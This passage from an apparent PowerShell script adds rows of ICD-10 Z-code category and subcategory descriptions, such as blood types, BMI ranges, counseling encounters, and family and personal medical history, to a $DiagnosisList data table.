$null = $DiagnosisList.Rows.Add("Problems related to other psychosocial circumstances","Conviction in civil and criminal proceedings without imprisonment") + $null = $DiagnosisList.Rows.Add("Problems related to other psychosocial circumstances","Imprisonment and other incarceration") + $null = $DiagnosisList.Rows.Add("Problems related to other psychosocial circumstances","Problems related to release from prison") + $null = $DiagnosisList.Rows.Add("Problems related to other psychosocial circumstances","Problems related to other legal circumstances") + $null = $DiagnosisList.Rows.Add("Problems related to other psychosocial circumstances","Victim of crime and terrorism") + $null = $DiagnosisList.Rows.Add("Problems related to other psychosocial circumstances","Exposure to disaster, war and other hostilities") + $null = $DiagnosisList.Rows.Add("Problems related to other psychosocial circumstances","Other specified problems related to psychosocial circumstances") + $null = $DiagnosisList.Rows.Add("Problems related to other psychosocial circumstances","Problem related to unspecified psychosocial circumstances") + $null = $DiagnosisList.Rows.Add("Do not resuscitate","Do not resuscitate") + $null = $DiagnosisList.Rows.Add("Type A blood","Type A blood, Rh positive") + $null = $DiagnosisList.Rows.Add("Type A blood","Type A blood, Rh negative") + $null = $DiagnosisList.Rows.Add("Type B blood","Type B blood, Rh positive") + $null = $DiagnosisList.Rows.Add("Type B blood","Type B blood, Rh negative") + $null = $DiagnosisList.Rows.Add("Type AB blood","Type AB blood, Rh positive") + $null = $DiagnosisList.Rows.Add("Type AB blood","Type AB blood, Rh negative") + $null = $DiagnosisList.Rows.Add("Type O blood","Type O blood, Rh positive") + $null = $DiagnosisList.Rows.Add("Type O blood","Type O blood, Rh negative") + $null = $DiagnosisList.Rows.Add("Unspecified blood type","Unspecified blood type, Rh positive") + $null = $DiagnosisList.Rows.Add("Unspecified blood type","Unspecified blood type, Rh negative") + $null = $DiagnosisList.Rows.Add("Body mass index [BMI]","Body mass index (BMI) 19.9 or less, adult") + $null = $DiagnosisList.Rows.Add("Body mass index (BMI) 20-29, adult","Body mass index (BMI) 20.0-20.9, adult") + $null = $DiagnosisList.Rows.Add("Body mass index (BMI) 20-29, adult","Body mass index (BMI) 21.0-21.9, adult") + $null = $DiagnosisList.Rows.Add("Body mass index (BMI) 20-29, adult","Body mass index (BMI) 22.0-22.9, adult") + $null = $DiagnosisList.Rows.Add("Body mass index (BMI) 20-29, adult","Body mass index (BMI) 23.0-23.9, adult") + $null = $DiagnosisList.Rows.Add("Body mass index (BMI) 20-29, adult","Body mass index (BMI) 24.0-24.9, adult") + $null = $DiagnosisList.Rows.Add("Body mass index (BMI) 20-29, adult","Body mass index (BMI) 25.0-25.9, adult") + $null = $DiagnosisList.Rows.Add("Body mass index (BMI) 20-29, adult","Body mass index (BMI) 26.0-26.9, adult") + $null = $DiagnosisList.Rows.Add("Body mass index (BMI) 20-29, adult","Body mass index (BMI) 27.0-27.9, adult") + $null = $DiagnosisList.Rows.Add("Body mass index (BMI) 20-29, adult","Body mass index (BMI) 28.0-28.9, adult") + $null = $DiagnosisList.Rows.Add("Body mass index (BMI) 20-29, adult","Body mass index (BMI) 29.0-29.9, adult") + $null = $DiagnosisList.Rows.Add("Body mass index (BMI) 30-39, adult","Body mass index (BMI) 30.0-30.9, adult") + $null = $DiagnosisList.Rows.Add("Body mass index (BMI) 30-39, adult","Body mass index (BMI) 31.0-31.9, adult") + $null = $DiagnosisList.Rows.Add("Body mass index (BMI) 30-39, adult","Body mass index (BMI) 32.0-32.9, adult") + $null = $DiagnosisList.Rows.Add("Body mass index (BMI) 30-39, adult","Body mass index (BMI) 33.0-33.9, adult") + $null = $DiagnosisList.Rows.Add("Body mass index (BMI) 30-39, adult","Body mass index (BMI) 34.0-34.9, adult") + $null = $DiagnosisList.Rows.Add("Body mass index (BMI) 30-39, adult","Body mass index (BMI) 35.0-35.9, adult") + $null = $DiagnosisList.Rows.Add("Body mass index (BMI) 30-39, adult","Body mass index (BMI) 36.0-36.9, adult") + $null = $DiagnosisList.Rows.Add("Body mass index (BMI) 30-39, adult","Body mass index (BMI) 37.0-37.9, adult") + $null = $DiagnosisList.Rows.Add("Body mass index (BMI) 30-39, adult","Body mass index (BMI) 38.0-38.9, adult") + $null = $DiagnosisList.Rows.Add("Body mass index (BMI) 30-39, adult","Body mass index (BMI) 39.0-39.9, adult") + $null = $DiagnosisList.Rows.Add("Body mass index (BMI) 40 or greater, adult","Body mass index (BMI) 40.0-44.9, adult") + $null = $DiagnosisList.Rows.Add("Body mass index (BMI) 40 or greater, adult","Body mass index (BMI) 45.0-49.9, adult") + $null = $DiagnosisList.Rows.Add("Body mass index (BMI) 40 or greater, adult","Body mass index (BMI) 50-59.9 , adult") + $null = $DiagnosisList.Rows.Add("Body mass index (BMI) 40 or greater, adult","Body mass index (BMI) 60.0-69.9, adult") + $null = $DiagnosisList.Rows.Add("Body mass index (BMI) 40 or greater, adult","Body mass index (BMI) 70 or greater, adult") + $null = $DiagnosisList.Rows.Add("Body mass index (BMI) pediatric","Body mass index (BMI) pediatric, less than 5th percentile for age") + $null = $DiagnosisList.Rows.Add("Body mass index (BMI) pediatric","Body mass index (BMI) pediatric, 5th percentile to less than 85th percentile for age") + $null = $DiagnosisList.Rows.Add("Body mass index (BMI) pediatric","Body mass index (BMI) pediatric, 85th percentile to less than 95th percentile for age") + $null = $DiagnosisList.Rows.Add("Body mass index (BMI) pediatric","Body mass index (BMI) pediatric, greater than or equal to 95th percentile for age") + $null = $DiagnosisList.Rows.Add("Encounter for mental health services for parental child abuse","Encounter for mental health services for victim of parental child abuse") + $null = $DiagnosisList.Rows.Add("Encounter for mental health services for parental child abuse","Encounter for mental health services for perpetrator of parental child abuse") + $null = $DiagnosisList.Rows.Add("Encounter for mental health services for non-parental child abuse","Encounter for mental health services for victim of non-parental child abuse") + $null = $DiagnosisList.Rows.Add("Encounter for mental health services for non-parental child abuse","Encounter for mental health services for perpetrator of non-parental child abuse") + $null = $DiagnosisList.Rows.Add("Encounter for mental health services for spousal or partner abuse problems","Encounter for mental health services for victim of spousal or partner abuse") + $null = $DiagnosisList.Rows.Add("Encounter for mental health services for spousal or partner abuse problems","Encounter for mental health services for perpetrator of spousal or partner abuse") + $null = $DiagnosisList.Rows.Add("Encounter for mental health services for victim or perpetrator of other abuse","Encounter for mental health services for victim of other abuse") + $null = $DiagnosisList.Rows.Add("Encounter for mental health services for victim or perpetrator of other abuse","Encounter for mental health services for perpetrator of other abuse") + $null = $DiagnosisList.Rows.Add("Counseling related to sexual attitude, behavior and orientation","Counseling related to sexual attitude") + $null = $DiagnosisList.Rows.Add("Counseling related to sexual attitude, behavior and orientation","Counseling related to patient's sexual behavior and orientation") + $null = $DiagnosisList.Rows.Add("Counseling related to sexual attitude, behavior and orientation","Counseling related to sexual behavior and orientation of third party") + $null = $DiagnosisList.Rows.Add("Counseling related to sexual attitude, behavior and orientation","Counseling related to combined concerns regarding sexual attitude, behavior and orientation") + $null = $DiagnosisList.Rows.Add("Counseling related to sexual attitude, behavior and orientation","Other sex counseling") + $null = $DiagnosisList.Rows.Add("Counseling related to sexual attitude, behavior and orientation","Sex counseling, unspecified") + $null = $DiagnosisList.Rows.Add("Persons encountering health services for other counseling and medical advice, not elsewhere classified","Person encountering health services to consult on behalf of another person") + $null = $DiagnosisList.Rows.Add("Persons encountering health services for other counseling and medical advice, not elsewhere classified","Person with feared health complaint in whom no diagnosis is made") + $null = $DiagnosisList.Rows.Add("Persons encountering health services for other counseling and medical advice, not elsewhere classified","Person consulting for explanation of examination or test findings") + $null = $DiagnosisList.Rows.Add("Persons encountering health services for other counseling and medical advice, not elsewhere classified","Dietary counseling and surveillance") + $null = $DiagnosisList.Rows.Add("Alcohol abuse counseling and surveillance","Alcohol abuse counseling and surveillance of alcoholic") + $null = $DiagnosisList.Rows.Add("Alcohol abuse counseling and surveillance","Counseling for family member of alcoholic") + $null = $DiagnosisList.Rows.Add("Drug abuse counseling and surveillance","Drug abuse counseling and surveillance of drug abuser") + $null = $DiagnosisList.Rows.Add("Drug abuse counseling and surveillance","Counseling for family member of drug abuser") + $null = $DiagnosisList.Rows.Add("Tobacco abuse counseling","Tobacco abuse counseling") + $null = $DiagnosisList.Rows.Add("Human immunodeficiency virus [HIV] counseling","Human immunodeficiency virus [HIV] counseling") + $null = $DiagnosisList.Rows.Add("Other specified counseling","Spiritual or religious counseling") + $null = $DiagnosisList.Rows.Add("Other specified counseling","Exercise counseling") + $null = $DiagnosisList.Rows.Add("Other specified counseling","Encounter for nonprocreative genetic counseling") + $null = $DiagnosisList.Rows.Add("Other specified counseling","Other specified counseling") + $null = $DiagnosisList.Rows.Add("Counseling, unspecified","Counseling, unspecified") + $null = $DiagnosisList.Rows.Add("Problems related to lifestyle","Tobacco use") + $null = $DiagnosisList.Rows.Add("Problems related to lifestyle","Lack of physical exercise") + $null = $DiagnosisList.Rows.Add("Problems related to lifestyle","Inappropriate diet and eating habits") + $null = $DiagnosisList.Rows.Add("High risk sexual behavior","High risk heterosexual behavior") + $null = $DiagnosisList.Rows.Add("High risk sexual behavior","High risk homosexual behavior") + $null = $DiagnosisList.Rows.Add("High risk sexual behavior","High risk bisexual behavior") + $null = $DiagnosisList.Rows.Add("Gambling and betting","Gambling and betting") + $null = $DiagnosisList.Rows.Add("Antisocial behavior","Child and adolescent antisocial behavior") + $null = $DiagnosisList.Rows.Add("Antisocial behavior","Adult antisocial behavior") + $null = $DiagnosisList.Rows.Add("Problems related to sleep","Sleep deprivation") + $null = $DiagnosisList.Rows.Add("Problems related to sleep","Inadequate sleep hygiene") + $null = $DiagnosisList.Rows.Add("Other problems related to lifestyle","Other problems related to lifestyle") + $null = $DiagnosisList.Rows.Add("Problem related to lifestyle, unspecified","Problem related to lifestyle, unspecified") + $null = $DiagnosisList.Rows.Add("Problems related to life management difficulty","Burn-out") + $null = $DiagnosisList.Rows.Add("Problems related to life management difficulty","Type A behavior pattern") + $null = $DiagnosisList.Rows.Add("Problems related to life management difficulty","Lack of relaxation and leisure") + $null = $DiagnosisList.Rows.Add("Problems related to life management difficulty","Stress, not elsewhere classified") + $null = $DiagnosisList.Rows.Add("Problems related to life management difficulty","Inadequate social skills, not elsewhere classified") + $null = $DiagnosisList.Rows.Add("Problems related to life management difficulty","Social role conflict, not elsewhere classified") + $null = $DiagnosisList.Rows.Add("Problems related to life management difficulty","Limitation of activities due to disability") + $null = $DiagnosisList.Rows.Add("Behavioral insomnia of childhood","Behavioral insomnia of childhood, sleep-onset association type") + $null = $DiagnosisList.Rows.Add("Behavioral insomnia of childhood","Behavioral insomnia of childhood, limit setting type") + $null = $DiagnosisList.Rows.Add("Behavioral insomnia of childhood","Behavioral insomnia of childhood, combined type") + $null = $DiagnosisList.Rows.Add("Behavioral insomnia of childhood","Behavioral insomnia of childhood, unspecified type") + $null = $DiagnosisList.Rows.Add("Dual sensory impairment","Dual sensory impairment") + $null = $DiagnosisList.Rows.Add("Other problems related to life management difficulty","Other problems related to life management difficulty") + $null = $DiagnosisList.Rows.Add("Problem related to life management difficulty, unspecified","Problem related to life management difficulty, unspecified") + $null = $DiagnosisList.Rows.Add("Reduced mobility","Bed confinement status") + $null = $DiagnosisList.Rows.Add("Reduced mobility","Other reduced mobility") + $null = $DiagnosisList.Rows.Add("Need for assistance with personal care","Need for assistance with personal care") + $null = $DiagnosisList.Rows.Add("Need for assistance at home and no other household member able to render care","Need for assistance at home and no other household member able to render care") + $null = $DiagnosisList.Rows.Add("Need for continuous supervision","Need for continuous supervision") + $null = $DiagnosisList.Rows.Add("Other problems related to care provider dependency","Other problems related to care provider dependency") + $null = $DiagnosisList.Rows.Add("Problem related to care provider dependency, unspecified","Problem related to care provider dependency, unspecified") + $null = $DiagnosisList.Rows.Add("Problems related to medical facilities and other health care","Medical services not available in home") + $null = $DiagnosisList.Rows.Add("Problems related to medical facilities and other health care","Person awaiting admission to adequate facility elsewhere") + $null = $DiagnosisList.Rows.Add("Problems related to medical facilities and other health care","Other waiting period for investigation and treatment") + $null = $DiagnosisList.Rows.Add("Problems related to medical facilities and other health care","Unavailability and inaccessibility of health-care facilities") + $null = $DiagnosisList.Rows.Add("Problems related to medical facilities and other health care","Unavailability and inaccessibility of other helping agencies") + $null = $DiagnosisList.Rows.Add("Problems related to medical facilities and other health care","Holiday relief care") + $null = $DiagnosisList.Rows.Add("Problems related to medical facilities and other health care","Other problems related to medical facilities and other health care") + $null = $DiagnosisList.Rows.Add("Problems related to medical facilities and other health care","Unspecified problem related to medical facilities and other health care") + $null = $DiagnosisList.Rows.Add("Persons encountering health services in other circumstances","Encounter for issue of repeat prescription") + $null = $DiagnosisList.Rows.Add("Persons encountering health services in other circumstances","Encounter for health supervision and care of foundling") + $null = $DiagnosisList.Rows.Add("Persons encountering health services in other circumstances","Encounter for health supervision and care of other healthy infant and child") + $null = $DiagnosisList.Rows.Add("Persons encountering health services in other circumstances","Healthy person accompanying sick person") + $null = $DiagnosisList.Rows.Add("Persons encountering health services in other circumstances","Other boarder to healthcare facility") + $null = $DiagnosisList.Rows.Add("Persons encountering health services in other circumstances","Malingerer [conscious simulation]") + $null = $DiagnosisList.Rows.Add("Persons encountering health services in other specified circumstances","Expectant parent(s) prebirth pediatrician visit") + $null = $DiagnosisList.Rows.Add("Persons encountering health services in other specified circumstances","Awaiting organ transplant status") + $null = $DiagnosisList.Rows.Add("Persons encountering health services in other specified circumstances","Persons encountering health services in other specified circumstances") + $null = $DiagnosisList.Rows.Add("Contact with and (suspected) exposure to hazardous metals","Contact with and (suspected) exposure to arsenic") + $null = $DiagnosisList.Rows.Add("Contact with and (suspected) exposure to hazardous metals","Contact with and (suspected) exposure to lead") + $null = $DiagnosisList.Rows.Add("Contact with and (suspected) exposure to hazardous metals","Contact with and (suspected) exposure to uranium") + $null = $DiagnosisList.Rows.Add("Contact with and (suspected) exposure to hazardous metals","Contact with and (suspected) exposure to other hazardous metals") + $null = $DiagnosisList.Rows.Add("Contact with and (suspected) exposure to hazardous aromatic compounds","Contact with and (suspected) exposure to aromatic amines") + $null = $DiagnosisList.Rows.Add("Contact with and (suspected) exposure to hazardous aromatic compounds","Contact with and (suspected) exposure to benzene") + $null = $DiagnosisList.Rows.Add("Contact with and (suspected) exposure to hazardous aromatic compounds","Contact with and (suspected) exposure to other hazardous aromatic compounds") + $null = $DiagnosisList.Rows.Add("Contact with and (suspected) exposure to other hazardous, chiefly nonmedicinal, chemicals","Contact with and (suspected) exposure to asbestos") + $null = $DiagnosisList.Rows.Add("Contact with and (suspected) exposure to other hazardous, chiefly nonmedicinal, chemicals","Contact with and (suspected) exposure to other hazardous, chiefly nonmedicinal, chemicals") + $null = $DiagnosisList.Rows.Add("Contact with and (suspected) exposure to environmental pollution","Contact with and (suspected) exposure to air pollution") + $null = $DiagnosisList.Rows.Add("Contact with and (suspected) exposure to environmental pollution","Contact with and (suspected) exposure to water pollution") + $null = $DiagnosisList.Rows.Add("Contact with and (suspected) exposure to environmental pollution","Contact with and (suspected) exposure to soil pollution") + $null = $DiagnosisList.Rows.Add("Contact with and (suspected) exposure to environmental pollution","Contact with and (suspected) exposure to other environmental pollution") + $null = $DiagnosisList.Rows.Add("Contact with and (suspected) exposure to hazards in the physical environment","Contact with and (suspected) exposure to mold (toxic)") + $null = $DiagnosisList.Rows.Add("Contact with and (suspected) exposure to hazards in the physical environment","Contact with and (suspected) exposure to harmful algae and algae toxins") + $null = $DiagnosisList.Rows.Add("Contact with and (suspected) exposure to hazards in the physical environment","Contact with and (suspected) exposure to noise") + $null = $DiagnosisList.Rows.Add("Contact with and (suspected) exposure to hazards in the physical environment","Contact with and (suspected) exposure to radon and other naturally occuring radiation") + $null = $DiagnosisList.Rows.Add("Contact with and (suspected) exposure to hazards in the physical environment","Contact with and (suspected) exposure to other hazards in the physical environment") + $null = $DiagnosisList.Rows.Add("Contact with and (suspected ) exposure to other hazardous substances","Contact with and (suspected) exposure to potentially hazardous body fluids") + $null = $DiagnosisList.Rows.Add("Contact with and (suspected ) exposure to other hazardous substances","Contact with and (suspected) exposure to environmental tobacco smoke (acute) (chronic)") + $null = $DiagnosisList.Rows.Add("Contact with and (suspected ) exposure to other hazardous substances","Contact with and (suspected ) exposure to other hazardous substances") + $null = $DiagnosisList.Rows.Add("Other contact with and (suspected) exposures hazardous to health","Other contact with and (suspected) exposures hazardous to health") + $null = $DiagnosisList.Rows.Add("Other specified health status","Asymptomatic menopausal state") + $null = $DiagnosisList.Rows.Add("Other specified health status","Physical restraint status") + $null = $DiagnosisList.Rows.Add("Other specified health status","Other specified health status") + $null = $DiagnosisList.Rows.Add("Long term (current) use of anticoagulants and antithrombotics/antiplatelets","Long term (current) use of anticoagulants") + $null = $DiagnosisList.Rows.Add("Long term (current) use of anticoagulants and antithrombotics/antiplatelets","Long term (current) use of antithrombotics/antiplatelets") + $null = $DiagnosisList.Rows.Add("Long term (current) use of non-steroidal anti-inflammatories (NSAID)","Long term (current) use of non-steroidal anti-inflammatories (NSAID)") + $null = $DiagnosisList.Rows.Add("Long term (current) use of antibiotics","Long term (current) use of antibiotics") + $null = $DiagnosisList.Rows.Add("Long term (current) use of hormonal contraceptives","Long term (current) use of hormonal contraceptives") + $null = $DiagnosisList.Rows.Add("Long term (current) use of insulin","Long term (current) use of insulin") + $null = $DiagnosisList.Rows.Add("Long term (current) use of steroids","Long term (current) use of inhaled steroids") + $null = $DiagnosisList.Rows.Add("Long term (current) use of steroids","Long term (current) use of systemic steroids") + $null = $DiagnosisList.Rows.Add("Long term (current) use of agents affecting estrogen receptors and estrogen levels","Long term (current) use of selective estrogen receptor modulators (SERMs)") + $null = $DiagnosisList.Rows.Add("Long term (current) use of agents affecting estrogen receptors and estrogen levels","Long term (current) use of aromatase inhibitors") + $null = $DiagnosisList.Rows.Add("Long term (current) use of agents affecting estrogen receptors and estrogen levels","Long term (current) use of other agents affecting estrogen receptors and estrogen levels") + $null = $DiagnosisList.Rows.Add("Long term (current) use of aspirin","Long term (current) use of aspirin") + $null = $DiagnosisList.Rows.Add("Long term (current) use of bisphosphonates","Long term (current) use of bisphosphonates") + $null = $DiagnosisList.Rows.Add("Long term (current) use of oral hypoglycemic drugs","Long term (current) use of oral hypoglycemic drugs") + $null = $DiagnosisList.Rows.Add("Other long term (current) drug therapy","Hormone replacement therapy") + $null = $DiagnosisList.Rows.Add("Other long term (current) drug therapy","Long term (current) use of opiate analgesic") + $null = $DiagnosisList.Rows.Add("Other long term (current) drug therapy","Other long term (current) drug therapy") + $null = $DiagnosisList.Rows.Add("Family history of primary malignant neoplasm","Family history of malignant neoplasm of digestive organs") + $null = $DiagnosisList.Rows.Add("Family history of primary malignant neoplasm","Family history of malignant neoplasm of trachea, bronchus and lung") + $null = $DiagnosisList.Rows.Add("Family history of primary malignant neoplasm","Family history of malignant neoplasm of other respiratory and intrathoracic organs") + $null = $DiagnosisList.Rows.Add("Family history of primary malignant neoplasm","Family history of malignant neoplasm of breast") + $null = $DiagnosisList.Rows.Add("Family history of malignant neoplasm of genital organs","Family history of malignant neoplasm of ovary") + $null = $DiagnosisList.Rows.Add("Family history of malignant neoplasm of genital organs","Family history of malignant neoplasm of prostate") + $null = $DiagnosisList.Rows.Add("Family history of malignant neoplasm of genital organs","Family history of malignant neoplasm of testis") + $null = $DiagnosisList.Rows.Add("Family history of malignant neoplasm of genital organs","Family history of malignant neoplasm of other genital organs") + $null = $DiagnosisList.Rows.Add("Family history of malignant neoplasm of urinary tract","Family history of malignant neoplasm of kidney") + $null = $DiagnosisList.Rows.Add("Family history of malignant neoplasm of urinary tract","Family history of malignant neoplasm of bladder") + $null = $DiagnosisList.Rows.Add("Family history of malignant neoplasm of urinary tract","Family history of malignant neoplasm of other urinary tract organ") + $null = $DiagnosisList.Rows.Add("Family history of leukemia","Family history of leukemia") + $null = $DiagnosisList.Rows.Add("Family history of other malignant neoplasms of lymphoid, hematopoietic and related tissues","Family history of other malignant neoplasms of lymphoid, hematopoietic and related tissues") + $null = $DiagnosisList.Rows.Add("Family history of malignant neoplasm of other organs or systems","Family history of malignant neoplasm of other organs or systems") + $null = $DiagnosisList.Rows.Add("Family history of malignant neoplasm, unspecified","Family history of malignant neoplasm, unspecified") + $null = $DiagnosisList.Rows.Add("Family history of mental and behavioral disorders","Family history of intellectual disabilities") + $null = $DiagnosisList.Rows.Add("Family history of mental and behavioral disorders","Family history of alcohol abuse and dependence") + $null = $DiagnosisList.Rows.Add("Family history of mental and behavioral disorders","Family history of tobacco abuse and dependence") + $null = $DiagnosisList.Rows.Add("Family history of mental and behavioral disorders","Family history of other psychoactive substance abuse and dependence") + $null = $DiagnosisList.Rows.Add("Family history of mental and behavioral disorders","Family history of other substance abuse and dependence") + $null = $DiagnosisList.Rows.Add("Family history of mental and behavioral disorders","Family history of other mental and behavioral disorders") + $null = $DiagnosisList.Rows.Add("Family history of certain disabilities and chronic diseases (leading to disablement)","Family history of epilepsy and other diseases of the nervous system") + $null = $DiagnosisList.Rows.Add("Family history of certain disabilities and chronic diseases (leading to disablement)","Family history of blindness and visual loss") + $null = $DiagnosisList.Rows.Add("Family history of certain disabilities and chronic diseases (leading to disablement)","Family history of deafness and hearing loss") + $null = $DiagnosisList.Rows.Add("Family history of certain disabilities and chronic diseases (leading to disablement)","Family history of stroke") + $null = $DiagnosisList.Rows.Add("Family history of ischemic heart disease and other diseases of the circulatory system","Family history of sudden cardiac death") + $null = $DiagnosisList.Rows.Add("Family history of ischemic heart disease and other diseases of the circulatory system","Family history of ischemic heart disease and other diseases of the circulatory system") + $null = $DiagnosisList.Rows.Add("Family history of asthma and other chronic lower respiratory diseases","Family history of asthma and other chronic lower respiratory diseases") + $null = $DiagnosisList.Rows.Add("Family history of arthritis and other diseases of the musculoskeletal system and connective tissue","Family history of arthritis") + $null = $DiagnosisList.Rows.Add("Family history of arthritis and other diseases of the musculoskeletal system and connective tissue","Family history of osteoporosis") + $null = $DiagnosisList.Rows.Add("Family history of arthritis and other diseases of the musculoskeletal system and connective tissue","Family history of other diseases of the musculoskeletal system and connective tissue") + $null = $DiagnosisList.Rows.Add("Family history of congenital malformations, deformations and chromosomal abnormalities","Family history of polycystic kidney") + $null = $DiagnosisList.Rows.Add("Family history of congenital malformations, deformations and chromosomal abnormalities","Family history of other congenital malformations, deformations and chromosomal abnormalities") + $null = $DiagnosisList.Rows.Add("Family history of other disabilities and chronic diseases leading to disablement, not elsewhere classified","Family history of other disabilities and chronic diseases leading to disablement, not elsewhere classified") + $null = $DiagnosisList.Rows.Add("Family history of other specific disorders","Family history of human immunodeficiency virus [HIV] disease") + $null = $DiagnosisList.Rows.Add("Family history of other specific disorders","Family history of other infectious and parasitic diseases") + $null = $DiagnosisList.Rows.Add("Family history of other specific disorders","Family history of diseases of the blood and blood-forming organs and certain disorders involving the immune mechanism") + $null = $DiagnosisList.Rows.Add("Family history of other specific disorders","Family history of diabetes mellitus") + $null = $DiagnosisList.Rows.Add("Family history of other endocrine, nutritional and metabolic diseases","Family history of multiple endocrine neoplasia [MEN] syndrome") + $null = $DiagnosisList.Rows.Add("Family history of other endocrine, nutritional and metabolic diseases","Family history of familial hypercholesterolemia") + $null = $DiagnosisList.Rows.Add("Family history of other endocrine, nutritional and metabolic diseases","Family history of other endocrine, nutritional and metabolic diseases") + $null = $DiagnosisList.Rows.Add("Family history of eye disorders","Family history of glaucoma") + $null = $DiagnosisList.Rows.Add("Family history of eye disorders","Family history of other specified eye disorder") + $null = $DiagnosisList.Rows.Add("Family history of ear disorders","Family history of ear disorders") + $null = $DiagnosisList.Rows.Add("Family history of other diseases of the respiratory system","Family history of other diseases of the respiratory system") + $null = $DiagnosisList.Rows.Add("Family history of diseases of the digestive system","Family history of colonic polyps") + $null = $DiagnosisList.Rows.Add("Family history of diseases of the digestive system","Family history of other diseases of the digestive system") + $null = $DiagnosisList.Rows.Add("Family history of other conditions","Family history of diseases of the skin and subcutaneous tissue") + $null = $DiagnosisList.Rows.Add("Family history of other conditions","Family history of disorders of kidney and ureter") + $null = $DiagnosisList.Rows.Add("Family history of other conditions","Family history of other diseases of the genitourinary system") + $null = $DiagnosisList.Rows.Add("Family history of other conditions","Family history of consanguinity") + $null = $DiagnosisList.Rows.Add("Family history of other specified conditions","Family history of carrier of genetic disease") + $null = $DiagnosisList.Rows.Add("Family history of other specified conditions","Family history of sudden infant death syndrome") + $null = $DiagnosisList.Rows.Add("Family history of other specified conditions","Family history of other specified conditions") + $null = $DiagnosisList.Rows.Add("Personal history of malignant neoplasm of digestive organs","Personal history of malignant neoplasm of unspecified digestive organ") + $null = $DiagnosisList.Rows.Add("Personal history of malignant neoplasm of digestive organs","Personal history of malignant neoplasm of esophagus") + $null = $DiagnosisList.Rows.Add("Personal history of malignant neoplasm of stomach","Personal history of malignant carcinoid tumor of stomach") + $null = $DiagnosisList.Rows.Add("Personal history of malignant neoplasm of stomach","Personal history of other malignant neoplasm of stomach") + $null = $DiagnosisList.Rows.Add("Personal history of malignant neoplasm of large intestine","Personal history of malignant carcinoid tumor of large intestine") + $null = $DiagnosisList.Rows.Add("Personal history of malignant neoplasm of large intestine","Personal history of other malignant neoplasm of large intestine") + $null = $DiagnosisList.Rows.Add("Personal history of malignant neoplasm of rectum, rectosigmoid junction, and anus","Personal history of malignant carcinoid tumor of rectum") + $null = $DiagnosisList.Rows.Add("Personal history of malignant neoplasm of rectum, rectosigmoid junction, and anus","Personal history of other malignant neoplasm of rectum, rectosigmoid junction, and anus") + $null = $DiagnosisList.Rows.Add("Personal history of malignant neoplasm of liver","Personal history of malignant neoplasm of liver") + $null = $DiagnosisList.Rows.Add("Personal history of malignant neoplasm of small intestine","Personal history of malignant carcinoid tumor of small intestine") + $null = $DiagnosisList.Rows.Add("Personal history of malignant neoplasm of small intestine","Personal history of other malignant neoplasm of small intestine") + $null = $DiagnosisList.Rows.Add("Personal history of malignant neoplasm of pancreas","Personal history of malignant neoplasm of pancreas") + $null = $DiagnosisList.Rows.Add("Personal history of malignant neoplasm of other digestive organs","Personal history of malignant neoplasm of other digestive organs") + $null = $DiagnosisList.Rows.Add("Personal history of malignant neoplasm of bronchus and lung","Personal history of malignant carcinoid tumor of bronchus and lung") + $null = $DiagnosisList.Rows.Add("Personal history of malignant neoplasm of bronchus and lung","Personal history of other malignant neoplasm of bronchus and lung") + $null = $DiagnosisList.Rows.Add("Personal history of malignant neoplasm of trachea","Personal history of malignant neoplasm of trachea") + $null = $DiagnosisList.Rows.Add("Personal history of malignant neoplasm of other respiratory and intrathoracic organs","Personal history of malignant neoplasm of unspecified respiratory organ") + $null = $DiagnosisList.Rows.Add("Personal history of malignant neoplasm of other respiratory and intrathoracic organs","Personal history of malignant neoplasm of larynx") + $null = $DiagnosisList.Rows.Add("Personal history of malignant neoplasm of other respiratory and intrathoracic organs","Personal history of malignant neoplasm of nasal cavities, middle ear, and accessory sinuses") + $null = $DiagnosisList.Rows.Add("Personal history of malignant neoplasm of thymus","Personal history of malignant carcinoid tumor of thymus") + $null = $DiagnosisList.Rows.Add("Personal history of malignant neoplasm of thymus","Personal history of other malignant neoplasm of thymus") + $null = $DiagnosisList.Rows.Add("Personal history of malignant neoplasm of other respiratory and intrathoracic organs","Personal history of malignant neoplasm of other respiratory and intrathoracic organs") + $null = $DiagnosisList.Rows.Add("Personal history of malignant neoplasm of breast","Personal history of malignant neoplasm of breast") + $null = $DiagnosisList.Rows.Add("Personal history of malignant neoplasm of genital organs","Personal history of malignant neoplasm of unspecified female genital organ") + $null = $DiagnosisList.Rows.Add("Personal history of malignant neoplasm of genital organs","Personal history of malignant neoplasm of cervix uteri") + $null = $DiagnosisList.Rows.Add("Personal history of malignant neoplasm of genital organs","Personal history of malignant neoplasm of other parts of uterus") + $null = $DiagnosisList.Rows.Add("Personal history of malignant neoplasm of genital organs","Personal history of malignant neoplasm of ovary") + $null = $DiagnosisList.Rows.Add("Personal history of malignant neoplasm of genital organs","Personal history of malignant neoplasm of other female genital organs") + $null = $DiagnosisList.Rows.Add("Personal history of malignant neoplasm of genital organs","Personal history of malignant neoplasm of unspecified male genital organ") + $null = $DiagnosisList.Rows.Add("Personal history of malignant neoplasm of genital organs","Personal history of malignant neoplasm of prostate") + $null = $DiagnosisList.Rows.Add("Personal history of malignant neoplasm of genital organs","Personal history of malignant neoplasm of testis") + $null = $DiagnosisList.Rows.Add("Personal history of malignant neoplasm of genital organs","Personal history of malignant neoplasm of epididymis") + $null = $DiagnosisList.Rows.Add("Personal history of malignant neoplasm of genital organs","Personal history of malignant neoplasm of other male genital organs") + $null = $DiagnosisList.Rows.Add("Personal history of malignant neoplasm of urinary tract","Personal history of malignant neoplasm of unspecified urinary tract organ") + $null = $DiagnosisList.Rows.Add("Personal history of malignant neoplasm of urinary tract","Personal history of malignant neoplasm of bladder") + $null = $DiagnosisList.Rows.Add("Personal history of malignant neoplasm of kidney","Personal history of malignant carcinoid tumor of kidney") + $null = $DiagnosisList.Rows.Add("Personal history of malignant neoplasm of kidney","Personal history of other malignant neoplasm of kidney") + $null = $DiagnosisList.Rows.Add("Personal history of malignant neoplasm of renal pelvis","Personal history of malignant neoplasm of renal pelvis") + $null = $DiagnosisList.Rows.Add("Personal history of malignant neoplasm of ureter","Personal history of malignant neoplasm of ureter") + $null = $DiagnosisList.Rows.Add("Personal history of malignant neoplasm of other urinary tract organ","Personal history of malignant neoplasm of other urinary tract organ") + $null = $DiagnosisList.Rows.Add("Personal history of leukemia","Personal history of leukemia") + $null = $DiagnosisList.Rows.Add("Personal history of other malignant neoplasms of lymphoid, hematopoietic and related tissues","Personal history of Hodgkin lymphoma") + $null = $DiagnosisList.Rows.Add("Personal history of other malignant neoplasms of lymphoid, hematopoietic and related tissues","Personal history of non-Hodgkin lymphomas") + $null = $DiagnosisList.Rows.Add("Personal history of other malignant neoplasms of lymphoid, hematopoietic and related tissues","Personal history of other malignant neoplasms of lymphoid, hematopoietic and related tissues") + 